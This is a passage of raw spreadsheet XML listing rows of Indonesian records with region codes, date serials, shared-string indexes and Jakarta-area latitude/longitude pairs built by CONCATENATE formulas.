      <c r="G1009" t="s">
        <v>3850</v>
      </c>
      <c r="H1009" t="s">
        <v>26</v>
      </c>
      <c r="I1009" t="s">
        <v>974</v>
      </c>
      <c r="J1009" t="s">
        <v>3658</v>
      </c>
      <c r="L1009" t="s">
        <v>3851</v>
      </c>
      <c r="M1009">
        <v>3175050002</v>
      </c>
      <c r="N1009">
        <v>3175050</v>
      </c>
      <c r="O1009">
        <v>3175</v>
      </c>
      <c r="P1009">
        <v>31</v>
      </c>
      <c r="Q1009" t="s">
        <v>1012</v>
      </c>
      <c r="R1009" t="s">
        <v>1013</v>
      </c>
      <c r="S1009" t="s">
        <v>547</v>
      </c>
      <c r="T1009" t="s">
        <v>33</v>
      </c>
      <c r="U1009" s="5">
        <v>10690947</v>
      </c>
      <c r="V1009" s="5" t="s">
        <v>15393</v>
      </c>
      <c r="W1009" s="5">
        <v>-616887</v>
      </c>
      <c r="X1009" t="s">
        <v>19183</v>
      </c>
      <c r="Y1009" t="str">
        <f t="shared" si="15"/>
        <v>-6.16887,106.90947</v>
      </c>
    </row>
    <row r="1010" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1010">
        <v>108581</v>
      </c>
      <c r="B1010" s="1">
        <v>43884</v>
      </c>
      <c r="C1010">
        <v>0</v>
      </c>
      <c r="D1010" t="s">
        <v>22</v>
      </c>
      <c r="E1010" t="s">
        <v>23</v>
      </c>
      <c r="F1010" t="s">
        <v>3852</v>
      </c>
      <c r="H1010" t="s">
        <v>26</v>
      </c>
      <c r="I1010" t="s">
        <v>886</v>
      </c>
      <c r="J1010" t="s">
        <v>2755</v>
      </c>
      <c r="L1010" t="s">
        <v>3853</v>
      </c>
      <c r="M1010">
        <v>3175050002</v>
      </c>
      <c r="N1010">
        <v>3175050</v>
      </c>
      <c r="O1010">
        <v>3175</v>
      </c>
      <c r="P1010">
        <v>31</v>
      </c>
      <c r="Q1010" t="s">
        <v>1012</v>
      </c>
      <c r="R1010" t="s">
        <v>1013</v>
      </c>
      <c r="S1010" t="s">
        <v>547</v>
      </c>
      <c r="T1010" t="s">
        <v>33</v>
      </c>
      <c r="U1010" s="5">
        <v>10690141</v>
      </c>
      <c r="V1010" s="5" t="s">
        <v>15394</v>
      </c>
      <c r="W1010" s="5">
        <v>-617320</v>
      </c>
      <c r="X1010" t="s">
        <v>19184</v>
      </c>
      <c r="Y1010" t="str">
        <f t="shared" si="15"/>
        <v>-6.17320,106.90141</v>
      </c>
    </row>
    <row r="1011" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1011">
        <v>108582</v>
      </c>
      <c r="B1011" s="1">
        <v>43884</v>
      </c>
      <c r="C1011">
        <v>0</v>
      </c>
      <c r="D1011" t="s">
        <v>22</v>
      </c>
      <c r="E1011" t="s">
        <v>23</v>
      </c>
      <c r="F1011" t="s">
        <v>3854</v>
      </c>
      <c r="G1011" t="s">
        <v>3855</v>
      </c>
      <c r="H1011" t="s">
        <v>26</v>
      </c>
      <c r="I1011" t="s">
        <v>843</v>
      </c>
      <c r="J1011" t="s">
        <v>3856</v>
      </c>
      <c r="L1011" t="s">
        <v>3857</v>
      </c>
      <c r="M1011">
        <v>3171100005</v>
      </c>
      <c r="N1011">
        <v>3171100</v>
      </c>
      <c r="O1011">
        <v>3171</v>
      </c>
      <c r="P1011">
        <v>31</v>
      </c>
      <c r="Q1011" t="s">
        <v>1630</v>
      </c>
      <c r="R1011" t="s">
        <v>107</v>
      </c>
      <c r="S1011" t="s">
        <v>108</v>
      </c>
      <c r="T1011" t="s">
        <v>33</v>
      </c>
      <c r="U1011" s="5">
        <v>10683735</v>
      </c>
      <c r="V1011" s="5" t="s">
        <v>15395</v>
      </c>
      <c r="W1011" s="5">
        <v>-621043</v>
      </c>
      <c r="X1011" t="s">
        <v>19185</v>
      </c>
      <c r="Y1011" t="str">
        <f t="shared" si="15"/>
        <v>-6.21043,106.83735</v>
      </c>
    </row>
    <row r="1012" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1012">
        <v>108583</v>
      </c>
      <c r="B1012" s="1">
        <v>43884</v>
      </c>
      <c r="C1012">
        <v>0</v>
      </c>
      <c r="D1012" t="s">
        <v>22</v>
      </c>
      <c r="E1012" t="s">
        <v>23</v>
      </c>
      <c r="F1012" t="s">
        <v>3858</v>
      </c>
      <c r="G1012" t="s">
        <v>3859</v>
      </c>
      <c r="H1012" t="s">
        <v>26</v>
      </c>
      <c r="I1012" t="s">
        <v>1689</v>
      </c>
      <c r="J1012" t="s">
        <v>2438</v>
      </c>
      <c r="L1012" t="s">
        <v>3860</v>
      </c>
      <c r="M1012">
        <v>3175050003</v>
      </c>
      <c r="N1012">
        <v>3175050</v>
      </c>
      <c r="O1012">
        <v>3175</v>
      </c>
      <c r="P1012">
        <v>31</v>
      </c>
      <c r="Q1012" t="s">
        <v>1740</v>
      </c>
      <c r="R1012" t="s">
        <v>1013</v>
      </c>
      <c r="S1012" t="s">
        <v>547</v>
      </c>
      <c r="T1012" t="s">
        <v>33</v>
      </c>
      <c r="U1012" s="5">
        <v>10691027</v>
      </c>
      <c r="V1012" s="5" t="s">
        <v>15396</v>
      </c>
      <c r="W1012" s="5">
        <v>-614521</v>
      </c>
      <c r="X1012" t="s">
        <v>19186</v>
      </c>
      <c r="Y1012" t="str">
        <f t="shared" si="15"/>
        <v>-6.14521,106.91027</v>
      </c>
    </row>
    <row r="1013" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1013">
        <v>108584</v>
      </c>
      <c r="B1013" s="1">
        <v>43884</v>
      </c>
      <c r="C1013">
        <v>0</v>
      </c>
      <c r="D1013" t="s">
        <v>22</v>
      </c>
      <c r="E1013" t="s">
        <v>23</v>
      </c>
      <c r="F1013" t="s">
        <v>3861</v>
      </c>
      <c r="G1013" t="s">
        <v>3862</v>
      </c>
      <c r="H1013" t="s">
        <v>26</v>
      </c>
      <c r="I1013" t="s">
        <v>929</v>
      </c>
      <c r="J1013" t="s">
        <v>3066</v>
      </c>
      <c r="L1013" t="s">
        <v>3863</v>
      </c>
      <c r="M1013">
        <v>3173020001</v>
      </c>
      <c r="N1013">
        <v>3173020</v>
      </c>
      <c r="O1013">
        <v>3173</v>
      </c>
      <c r="P1013">
        <v>31</v>
      </c>
      <c r="Q1013" t="s">
        <v>179</v>
      </c>
      <c r="R1013" t="s">
        <v>179</v>
      </c>
      <c r="S1013" t="s">
        <v>62</v>
      </c>
      <c r="T1013" t="s">
        <v>33</v>
      </c>
      <c r="U1013" s="5">
        <v>10683380</v>
      </c>
      <c r="V1013" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W1013" s="5">
        <v>-619926</v>
      </c>
      <c r="X1013" t="s">
        <v>18957</v>
      </c>
      <c r="Y1013" t="str">
        <f t="shared" si="15"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="1014" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1014">
        <v>108585</v>
      </c>
      <c r="B1014" s="1">
        <v>43884</v>
      </c>
      <c r="C1014">
        <v>0</v>
      </c>
      <c r="D1014" t="s">
        <v>22</v>
      </c>
      <c r="E1014" t="s">
        <v>23</v>
      </c>
      <c r="F1014" t="s">
        <v>3864</v>
      </c>
      <c r="H1014" t="s">
        <v>26</v>
      </c>
      <c r="I1014" t="s">
        <v>3865</v>
      </c>
      <c r="J1014" t="s">
        <v>3866</v>
      </c>
      <c r="L1014" t="s">
        <v>3867</v>
      </c>
      <c r="M1014">
        <v>3174030001</v>
      </c>
      <c r="N1014">
        <v>3174030</v>
      </c>
      <c r="O1014">
        <v>3174</v>
      </c>
      <c r="P1014">
        <v>31</v>
      </c>
      <c r="Q1014" t="s">
        <v>1487</v>
      </c>
      <c r="R1014" t="s">
        <v>1487</v>
      </c>
      <c r="S1014" t="s">
        <v>32</v>
      </c>
      <c r="T1014" t="s">
        <v>33</v>
      </c>
      <c r="U1014" s="5">
        <v>10678720</v>
      </c>
      <c r="V1014" s="5" t="s">
        <v>15397</v>
      </c>
      <c r="W1014" s="5">
        <v>-619973</v>
      </c>
      <c r="X1014" t="s">
        <v>19187</v>
      </c>
      <c r="Y1014" t="str">
        <f t="shared" si="15"/>
        <v>-6.19973,106.78720</v>
      </c>
    </row>
    <row r="1015" spans="1:25" hidden="1" x14ac:dyDescent="0.25">
      <c r="A1015" s="4"/>
      <c r="V1015" s="5" t="s">
        <v>15398</v>
      </c>
      <c r="X1015" t="s">
        <v>15398</v>
      </c>
      <c r="Y1015" t="str">
        <f t="shared" si="15"/>
        <v>Cek,Cek</v>
      </c>
    </row>
    <row r="1016" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1016">
        <v>108587</v>
      </c>
      <c r="B1016" s="1">
        <v>43884</v>
      </c>
      <c r="C1016">
        <v>0</v>
      </c>
      <c r="D1016" t="s">
        <v>22</v>
      </c>
      <c r="E1016" t="s">
        <v>23</v>
      </c>
      <c r="F1016" t="s">
        <v>3868</v>
      </c>
      <c r="G1016" t="s">
        <v>3869</v>
      </c>
      <c r="H1016" t="s">
        <v>26</v>
      </c>
      <c r="I1016" t="s">
        <v>1824</v>
      </c>
      <c r="J1016" t="s">
        <v>2276</v>
      </c>
      <c r="L1016" t="s">
        <v>3870</v>
      </c>
      <c r="M1016">
        <v>3175060001</v>
      </c>
      <c r="N1016">
        <v>3175060</v>
      </c>
      <c r="O1016">
        <v>3175</v>
      </c>
      <c r="P1016">
        <v>31</v>
      </c>
      <c r="Q1016" t="s">
        <v>2278</v>
      </c>
      <c r="R1016" t="s">
        <v>2279</v>
      </c>
      <c r="S1016" t="s">
        <v>547</v>
      </c>
      <c r="T1016" t="s">
        <v>33</v>
      </c>
      <c r="U1016" s="5">
        <v>10692336</v>
      </c>
      <c r="V1016" s="5" t="s">
        <v>15399</v>
      </c>
      <c r="W1016" s="5">
        <v>-615788</v>
      </c>
      <c r="X1016" t="s">
        <v>19188</v>
      </c>
      <c r="Y1016" t="str">
        <f t="shared" si="15"/>
        <v>-6.15788,106.92336</v>
      </c>
    </row>
    <row r="1017" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1017">
        <v>108588</v>
      </c>
      <c r="B1017" s="1">
        <v>43884</v>
      </c>
      <c r="C1017">
        <v>0</v>
      </c>
      <c r="D1017" t="s">
        <v>22</v>
      </c>
      <c r="E1017" t="s">
        <v>23</v>
      </c>
      <c r="F1017" t="s">
        <v>3871</v>
      </c>
      <c r="G1017" t="s">
        <v>3872</v>
      </c>
      <c r="H1017" t="s">
        <v>26</v>
      </c>
      <c r="I1017" t="s">
        <v>383</v>
      </c>
      <c r="J1017" t="s">
        <v>3559</v>
      </c>
      <c r="L1017" t="s">
        <v>3873</v>
      </c>
      <c r="M1017">
        <v>3175060001</v>
      </c>
      <c r="N1017">
        <v>3175060</v>
      </c>
      <c r="O1017">
        <v>3175</v>
      </c>
      <c r="P1017">
        <v>31</v>
      </c>
      <c r="Q1017" t="s">
        <v>2278</v>
      </c>
      <c r="R1017" t="s">
        <v>2279</v>
      </c>
      <c r="S1017" t="s">
        <v>547</v>
      </c>
      <c r="T1017" t="s">
        <v>33</v>
      </c>
      <c r="U1017" s="5">
        <v>10692230</v>
      </c>
      <c r="V1017" s="5" t="s">
        <v>15400</v>
      </c>
      <c r="W1017" s="5">
        <v>-615592</v>
      </c>
      <c r="X1017" t="s">
        <v>18538</v>
      </c>
      <c r="Y1017" t="str">
        <f t="shared" si="15"/>
        <v>-6.15592,106.92230</v>
      </c>
    </row>
    <row r="1018" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1018">
        <v>108589</v>
      </c>
      <c r="B1018" s="1">
        <v>43884</v>
      </c>
      <c r="C1018">
        <v>0</v>
      </c>
      <c r="D1018" t="s">
        <v>22</v>
      </c>
      <c r="E1018" t="s">
        <v>23</v>
      </c>
      <c r="F1018" t="s">
        <v>3874</v>
      </c>
      <c r="G1018" t="s">
        <v>3875</v>
      </c>
      <c r="H1018" t="s">
        <v>26</v>
      </c>
      <c r="I1018" t="s">
        <v>3668</v>
      </c>
      <c r="J1018" t="s">
        <v>2672</v>
      </c>
      <c r="L1018" t="s">
        <v>3876</v>
      </c>
      <c r="M1018">
        <v>3172080005</v>
      </c>
      <c r="N1018">
        <v>3172080</v>
      </c>
      <c r="O1018">
        <v>3172</v>
      </c>
      <c r="P1018">
        <v>31</v>
      </c>
      <c r="Q1018" t="s">
        <v>140</v>
      </c>
      <c r="R1018" t="s">
        <v>141</v>
      </c>
      <c r="S1018" t="s">
        <v>49</v>
      </c>
      <c r="T1018" t="s">
        <v>33</v>
      </c>
      <c r="U1018" s="5">
        <v>10695323</v>
      </c>
      <c r="V1018" s="5" t="s">
        <v>15401</v>
      </c>
      <c r="W1018" s="5">
        <v>-616095</v>
      </c>
      <c r="X1018" t="s">
        <v>19189</v>
      </c>
      <c r="Y1018" t="str">
        <f t="shared" si="15"/>
        <v>-6.16095,106.95323</v>
      </c>
    </row>
    <row r="1019" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1019">
        <v>108590</v>
      </c>
      <c r="B1019" s="1">
        <v>43884</v>
      </c>
      <c r="C1019">
        <v>0</v>
      </c>
      <c r="D1019" t="s">
        <v>22</v>
      </c>
      <c r="E1019" t="s">
        <v>23</v>
      </c>
      <c r="F1019" t="s">
        <v>3877</v>
      </c>
      <c r="G1019" t="s">
        <v>3878</v>
      </c>
      <c r="H1019" t="s">
        <v>26</v>
      </c>
      <c r="I1019" t="s">
        <v>1046</v>
      </c>
      <c r="J1019" t="s">
        <v>3135</v>
      </c>
      <c r="L1019" t="s">
        <v>3879</v>
      </c>
      <c r="M1019">
        <v>3603170008</v>
      </c>
      <c r="N1019">
        <v>3603170</v>
      </c>
      <c r="O1019">
        <v>3603</v>
      </c>
      <c r="P1019">
        <v>36</v>
      </c>
      <c r="Q1019" t="s">
        <v>3880</v>
      </c>
      <c r="R1019" t="s">
        <v>3880</v>
      </c>
      <c r="S1019" t="s">
        <v>201</v>
      </c>
      <c r="T1019" t="s">
        <v>171</v>
      </c>
      <c r="U1019" s="5">
        <v>10651373</v>
      </c>
      <c r="V1019" s="5" t="s">
        <v>15402</v>
      </c>
      <c r="W1019" s="5">
        <v>-611348</v>
      </c>
      <c r="X1019" t="s">
        <v>19190</v>
      </c>
      <c r="Y1019" t="str">
        <f t="shared" si="15"/>
        <v>-6.11348,106.51373</v>
      </c>
    </row>
    <row r="1020" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1020">
        <v>108591</v>
      </c>
      <c r="B1020" s="1">
        <v>43884</v>
      </c>
      <c r="C1020">
        <v>0</v>
      </c>
      <c r="D1020" t="s">
        <v>22</v>
      </c>
      <c r="E1020" t="s">
        <v>23</v>
      </c>
      <c r="F1020" t="s">
        <v>3881</v>
      </c>
      <c r="H1020" t="s">
        <v>26</v>
      </c>
      <c r="I1020" t="s">
        <v>3882</v>
      </c>
      <c r="J1020" t="s">
        <v>2412</v>
      </c>
      <c r="L1020" t="s">
        <v>3883</v>
      </c>
      <c r="M1020">
        <v>3172090006</v>
      </c>
      <c r="N1020">
        <v>3172090</v>
      </c>
      <c r="O1020">
        <v>3172</v>
      </c>
      <c r="P1020">
        <v>31</v>
      </c>
      <c r="Q1020" t="s">
        <v>2283</v>
      </c>
      <c r="R1020" t="s">
        <v>890</v>
      </c>
      <c r="S1020" t="s">
        <v>49</v>
      </c>
      <c r="T1020" t="s">
        <v>33</v>
      </c>
      <c r="U1020" s="5">
        <v>10688268</v>
      </c>
      <c r="V1020" s="5" t="s">
        <v>15403</v>
      </c>
      <c r="W1020" s="5">
        <v>-617444</v>
      </c>
      <c r="X1020" t="s">
        <v>19191</v>
      </c>
      <c r="Y1020" t="str">
        <f t="shared" si="15"/>
        <v>-6.17444,106.88268</v>
      </c>
    </row>
    <row r="1021" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1021">
        <v>108592</v>
      </c>
      <c r="B1021" s="1">
        <v>43884</v>
      </c>
      <c r="C1021">
        <v>0</v>
      </c>
      <c r="D1021" t="s">
        <v>22</v>
      </c>
      <c r="E1021" t="s">
        <v>23</v>
      </c>
      <c r="F1021" t="s">
        <v>3884</v>
      </c>
      <c r="G1021" t="s">
        <v>3885</v>
      </c>
      <c r="H1021" t="s">
        <v>26</v>
      </c>
      <c r="I1021" t="s">
        <v>1971</v>
      </c>
      <c r="J1021" t="s">
        <v>3886</v>
      </c>
      <c r="L1021" t="s">
        <v>3887</v>
      </c>
      <c r="M1021">
        <v>3175060006</v>
      </c>
      <c r="N1021">
        <v>3175060</v>
      </c>
      <c r="O1021">
        <v>3175</v>
      </c>
      <c r="P1021">
        <v>31</v>
      </c>
      <c r="Q1021" t="s">
        <v>2409</v>
      </c>
      <c r="R1021" t="s">
        <v>2279</v>
      </c>
      <c r="S1021" t="s">
        <v>547</v>
      </c>
      <c r="T1021" t="s">
        <v>33</v>
      </c>
      <c r="U1021" s="5">
        <v>10692544</v>
      </c>
      <c r="V1021" s="5" t="s">
        <v>15404</v>
      </c>
      <c r="W1021" s="5">
        <v>-613296</v>
      </c>
      <c r="X1021" t="s">
        <v>19192</v>
      </c>
      <c r="Y1021" t="str">
        <f t="shared" si="15"/>
        <v>-6.13296,106.92544</v>
      </c>
    </row>
    <row r="1022" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1022">
        <v>108593</v>
      </c>
      <c r="B1022" s="1">
        <v>43884</v>
      </c>
      <c r="C1022">
        <v>0</v>
      </c>
      <c r="D1022" t="s">
        <v>22</v>
      </c>
      <c r="E1022" t="s">
        <v>23</v>
      </c>
      <c r="F1022" t="s">
        <v>3888</v>
      </c>
      <c r="G1022" t="s">
        <v>3889</v>
      </c>
      <c r="H1022" t="s">
        <v>26</v>
      </c>
      <c r="I1022" t="s">
        <v>197</v>
      </c>
      <c r="J1022" t="s">
        <v>3501</v>
      </c>
      <c r="L1022" t="s">
        <v>3890</v>
      </c>
      <c r="M1022">
        <v>3175060001</v>
      </c>
      <c r="N1022">
        <v>3175060</v>
      </c>
      <c r="O1022">
        <v>3175</v>
      </c>
      <c r="P1022">
        <v>31</v>
      </c>
      <c r="Q1022" t="s">
        <v>2278</v>
      </c>
      <c r="R1022" t="s">
        <v>2279</v>
      </c>
      <c r="S1022" t="s">
        <v>547</v>
      </c>
      <c r="T1022" t="s">
        <v>33</v>
      </c>
      <c r="U1022" s="5">
        <v>10691905</v>
      </c>
      <c r="V1022" s="5" t="s">
        <v>15289</v>
      </c>
      <c r="W1022" s="5">
        <v>-614400</v>
      </c>
      <c r="X1022" t="s">
        <v>19082</v>
      </c>
      <c r="Y1022" t="str">
        <f t="shared" si="15"/>
        <v>-6.14400,106.91905</v>
      </c>
    </row>
    <row r="1023" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1023">
        <v>108594</v>
      </c>
      <c r="B1023" s="1">
        <v>43884</v>
      </c>
      <c r="C1023">
        <v>0</v>
      </c>
      <c r="D1023" t="s">
        <v>22</v>
      </c>
      <c r="E1023" t="s">
        <v>23</v>
      </c>
      <c r="F1023" t="s">
        <v>3891</v>
      </c>
      <c r="H1023" t="s">
        <v>26</v>
      </c>
      <c r="I1023" t="s">
        <v>383</v>
      </c>
      <c r="J1023" t="s">
        <v>3892</v>
      </c>
      <c r="L1023" t="s">
        <v>3893</v>
      </c>
      <c r="M1023">
        <v>3175050002</v>
      </c>
      <c r="N1023">
        <v>3175050</v>
      </c>
      <c r="O1023">
        <v>3175</v>
      </c>
      <c r="P1023">
        <v>31</v>
      </c>
      <c r="Q1023" t="s">
        <v>1012</v>
      </c>
      <c r="R1023" t="s">
        <v>1013</v>
      </c>
      <c r="S1023" t="s">
        <v>547</v>
      </c>
      <c r="T1023" t="s">
        <v>33</v>
      </c>
      <c r="U1023" s="5">
        <v>10690350</v>
      </c>
      <c r="V1023" s="5" t="s">
        <v>15405</v>
      </c>
      <c r="W1023" s="5">
        <v>-616624</v>
      </c>
      <c r="X1023" t="s">
        <v>19193</v>
      </c>
      <c r="Y1023" t="str">
        <f t="shared" si="15"/>
        <v>-6.16624,106.90350</v>
      </c>
    </row>
    <row r="1024" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1024">
        <v>108595</v>
      </c>
      <c r="B1024" s="1">
        <v>43884</v>
      </c>
      <c r="C1024">
        <v>0</v>
      </c>
      <c r="D1024" t="s">
        <v>22</v>
      </c>
      <c r="E1024" t="s">
        <v>23</v>
      </c>
      <c r="F1024" t="s">
        <v>3894</v>
      </c>
      <c r="G1024" t="s">
        <v>3895</v>
      </c>
      <c r="H1024" t="s">
        <v>26</v>
      </c>
      <c r="I1024" t="s">
        <v>65</v>
      </c>
      <c r="J1024" t="s">
        <v>3896</v>
      </c>
      <c r="M1024">
        <v>3175060006</v>
      </c>
      <c r="N1024">
        <v>3175060</v>
      </c>
      <c r="O1024">
        <v>3175</v>
      </c>
      <c r="P1024">
        <v>31</v>
      </c>
      <c r="Q1024" t="s">
        <v>2409</v>
      </c>
      <c r="R1024" t="s">
        <v>2279</v>
      </c>
      <c r="S1024" t="s">
        <v>547</v>
      </c>
      <c r="T1024" t="s">
        <v>33</v>
      </c>
      <c r="U1024" s="5">
        <v>10691961</v>
      </c>
      <c r="V1024" s="5" t="s">
        <v>15406</v>
      </c>
      <c r="W1024" s="5">
        <v>-613261</v>
      </c>
      <c r="X1024" t="s">
        <v>19194</v>
      </c>
      <c r="Y1024" t="str">
        <f t="shared" si="15"/>
        <v>-6.13261,106.91961</v>
      </c>
    </row>
    <row r="1025" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1025">
        <v>108596</v>
      </c>
      <c r="B1025" s="1">
        <v>43884</v>
      </c>
      <c r="C1025">
        <v>0</v>
      </c>
      <c r="D1025" t="s">
        <v>22</v>
      </c>
      <c r="E1025" t="s">
        <v>23</v>
      </c>
      <c r="F1025" t="s">
        <v>3897</v>
      </c>
      <c r="G1025" t="s">
        <v>3898</v>
      </c>
      <c r="H1025" t="s">
        <v>26</v>
      </c>
      <c r="I1025" t="s">
        <v>383</v>
      </c>
      <c r="J1025" t="s">
        <v>3343</v>
      </c>
      <c r="L1025" t="s">
        <v>3899</v>
      </c>
      <c r="M1025">
        <v>3175050001</v>
      </c>
      <c r="N1025">
        <v>3175050</v>
      </c>
      <c r="O1025">
        <v>3175</v>
      </c>
      <c r="P1025">
        <v>31</v>
      </c>
      <c r="Q1025" t="s">
        <v>1037</v>
      </c>
      <c r="R1025" t="s">
        <v>1013</v>
      </c>
      <c r="S1025" t="s">
        <v>547</v>
      </c>
      <c r="T1025" t="s">
        <v>33</v>
      </c>
      <c r="U1025" s="5">
        <v>10690518</v>
      </c>
      <c r="V1025" s="5" t="s">
        <v>15407</v>
      </c>
      <c r="W1025" s="5">
        <v>-614895</v>
      </c>
      <c r="X1025" t="s">
        <v>19195</v>
      </c>
      <c r="Y1025" t="str">
        <f t="shared" si="15"/>
        <v>-6.14895,106.90518</v>
      </c>
    </row>
    <row r="1026" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1026">
        <v>108597</v>
      </c>
      <c r="B1026" s="1">
        <v>43884</v>
      </c>
      <c r="C1026">
        <v>0</v>
      </c>
      <c r="D1026" t="s">
        <v>22</v>
      </c>
      <c r="E1026" t="s">
        <v>23</v>
      </c>
      <c r="F1026" t="s">
        <v>3900</v>
      </c>
      <c r="G1026" t="s">
        <v>3901</v>
      </c>
      <c r="H1026" t="s">
        <v>26</v>
      </c>
      <c r="I1026" t="s">
        <v>1394</v>
      </c>
      <c r="J1026" t="s">
        <v>2479</v>
      </c>
      <c r="L1026" t="s">
        <v>3902</v>
      </c>
      <c r="M1026">
        <v>3172080005</v>
      </c>
      <c r="N1026">
        <v>3172080</v>
      </c>
      <c r="O1026">
        <v>3172</v>
      </c>
      <c r="P1026">
        <v>31</v>
      </c>
      <c r="Q1026" t="s">
        <v>140</v>
      </c>
      <c r="R1026" t="s">
        <v>141</v>
      </c>
      <c r="S1026" t="s">
        <v>49</v>
      </c>
      <c r="T1026" t="s">
        <v>33</v>
      </c>
      <c r="U1026" s="5">
        <v>10694641</v>
      </c>
      <c r="V1026" s="5" t="s">
        <v>15408</v>
      </c>
      <c r="W1026" s="5">
        <v>-619291</v>
      </c>
      <c r="X1026" t="s">
        <v>19093</v>
      </c>
      <c r="Y1026" t="str">
        <f t="shared" si="15"/>
        <v>-6.19291,106.94641</v>
      </c>
    </row>
    <row r="1027" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1027">
        <v>108598</v>
      </c>
      <c r="B1027" s="1">
        <v>43884</v>
      </c>
      <c r="C1027">
        <v>0</v>
      </c>
      <c r="D1027" t="s">
        <v>22</v>
      </c>
      <c r="E1027" t="s">
        <v>23</v>
      </c>
      <c r="F1027" t="s">
        <v>3903</v>
      </c>
      <c r="H1027" t="s">
        <v>26</v>
      </c>
      <c r="I1027" t="s">
        <v>882</v>
      </c>
      <c r="J1027" t="s">
        <v>2627</v>
      </c>
      <c r="L1027" t="s">
        <v>3904</v>
      </c>
      <c r="M1027">
        <v>3216100002</v>
      </c>
      <c r="N1027">
        <v>3216100</v>
      </c>
      <c r="O1027">
        <v>3216</v>
      </c>
      <c r="P1027">
        <v>32</v>
      </c>
      <c r="Q1027" t="s">
        <v>3193</v>
      </c>
      <c r="R1027" t="s">
        <v>940</v>
      </c>
      <c r="S1027" t="s">
        <v>41</v>
      </c>
      <c r="T1027" t="s">
        <v>42</v>
      </c>
      <c r="U1027" s="5">
        <v>10699477</v>
      </c>
      <c r="V1027" s="5" t="s">
        <v>15409</v>
      </c>
      <c r="W1027" s="5">
        <v>-615929</v>
      </c>
      <c r="X1027" t="s">
        <v>19196</v>
      </c>
      <c r="Y1027" t="str">
        <f t="shared" ref="Y1027:Y1090" si="16">CONCATENATE(X1027,",",V1027)</f>
        <v>-6.15929,106.99477</v>
      </c>
    </row>
    <row r="1028" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1028">
        <v>108599</v>
      </c>
      <c r="B1028" s="1">
        <v>43884</v>
      </c>
      <c r="C1028">
        <v>1</v>
      </c>
      <c r="D1028" t="s">
        <v>22</v>
      </c>
      <c r="E1028" t="s">
        <v>23</v>
      </c>
      <c r="F1028" t="s">
        <v>3905</v>
      </c>
      <c r="H1028" t="s">
        <v>26</v>
      </c>
      <c r="I1028" t="s">
        <v>166</v>
      </c>
      <c r="J1028" t="s">
        <v>2412</v>
      </c>
      <c r="L1028" t="s">
        <v>3906</v>
      </c>
      <c r="M1028">
        <v>3172090006</v>
      </c>
      <c r="N1028">
        <v>3172090</v>
      </c>
      <c r="O1028">
        <v>3172</v>
      </c>
      <c r="P1028">
        <v>31</v>
      </c>
      <c r="Q1028" t="s">
        <v>2283</v>
      </c>
      <c r="R1028" t="s">
        <v>890</v>
      </c>
      <c r="S1028" t="s">
        <v>49</v>
      </c>
      <c r="T1028" t="s">
        <v>33</v>
      </c>
      <c r="U1028" s="5">
        <v>10688526</v>
      </c>
      <c r="V1028" s="5" t="s">
        <v>15410</v>
      </c>
      <c r="W1028" s="5">
        <v>-617680</v>
      </c>
      <c r="X1028" t="s">
        <v>19197</v>
      </c>
      <c r="Y1028" t="str">
        <f t="shared" si="16"/>
        <v>-6.17680,106.88526</v>
      </c>
    </row>
    <row r="1029" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1029">
        <v>108600</v>
      </c>
      <c r="B1029" s="1">
        <v>43884</v>
      </c>
      <c r="C1029">
        <v>1</v>
      </c>
      <c r="D1029" t="s">
        <v>22</v>
      </c>
      <c r="E1029" t="s">
        <v>23</v>
      </c>
      <c r="F1029" t="s">
        <v>3907</v>
      </c>
      <c r="G1029" t="s">
        <v>3908</v>
      </c>
      <c r="H1029" t="s">
        <v>26</v>
      </c>
      <c r="I1029" t="s">
        <v>511</v>
      </c>
      <c r="J1029" t="s">
        <v>3909</v>
      </c>
      <c r="L1029" t="s">
        <v>3910</v>
      </c>
      <c r="M1029">
        <v>3175060004</v>
      </c>
      <c r="N1029">
        <v>3175060</v>
      </c>
      <c r="O1029">
        <v>3175</v>
      </c>
      <c r="P1029">
        <v>31</v>
      </c>
      <c r="Q1029" t="s">
        <v>2279</v>
      </c>
      <c r="R1029" t="s">
        <v>2279</v>
      </c>
      <c r="S1029" t="s">
        <v>547</v>
      </c>
      <c r="T1029" t="s">
        <v>33</v>
      </c>
      <c r="U1029" s="5">
        <v>10693670</v>
      </c>
      <c r="V1029" s="5" t="s">
        <v>15411</v>
      </c>
      <c r="W1029" s="5">
        <v>-610664</v>
      </c>
      <c r="X1029" t="s">
        <v>19198</v>
      </c>
      <c r="Y1029" t="str">
        <f t="shared" si="16"/>
        <v>-6.10664,106.93670</v>
      </c>
    </row>
    <row r="1030" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1030">
        <v>108601</v>
      </c>
      <c r="B1030" s="1">
        <v>43884</v>
      </c>
      <c r="C1030">
        <v>1</v>
      </c>
      <c r="D1030" t="s">
        <v>22</v>
      </c>
      <c r="E1030" t="s">
        <v>23</v>
      </c>
      <c r="F1030" t="s">
        <v>3911</v>
      </c>
      <c r="G1030" t="s">
        <v>3912</v>
      </c>
      <c r="H1030" t="s">
        <v>26</v>
      </c>
      <c r="I1030" t="s">
        <v>3913</v>
      </c>
      <c r="J1030" t="s">
        <v>3914</v>
      </c>
      <c r="L1030" t="s">
        <v>3915</v>
      </c>
      <c r="M1030">
        <v>3175060004</v>
      </c>
      <c r="N1030">
        <v>3175060</v>
      </c>
      <c r="O1030">
        <v>3175</v>
      </c>
      <c r="P1030">
        <v>31</v>
      </c>
      <c r="Q1030" t="s">
        <v>2279</v>
      </c>
      <c r="R1030" t="s">
        <v>2279</v>
      </c>
      <c r="S1030" t="s">
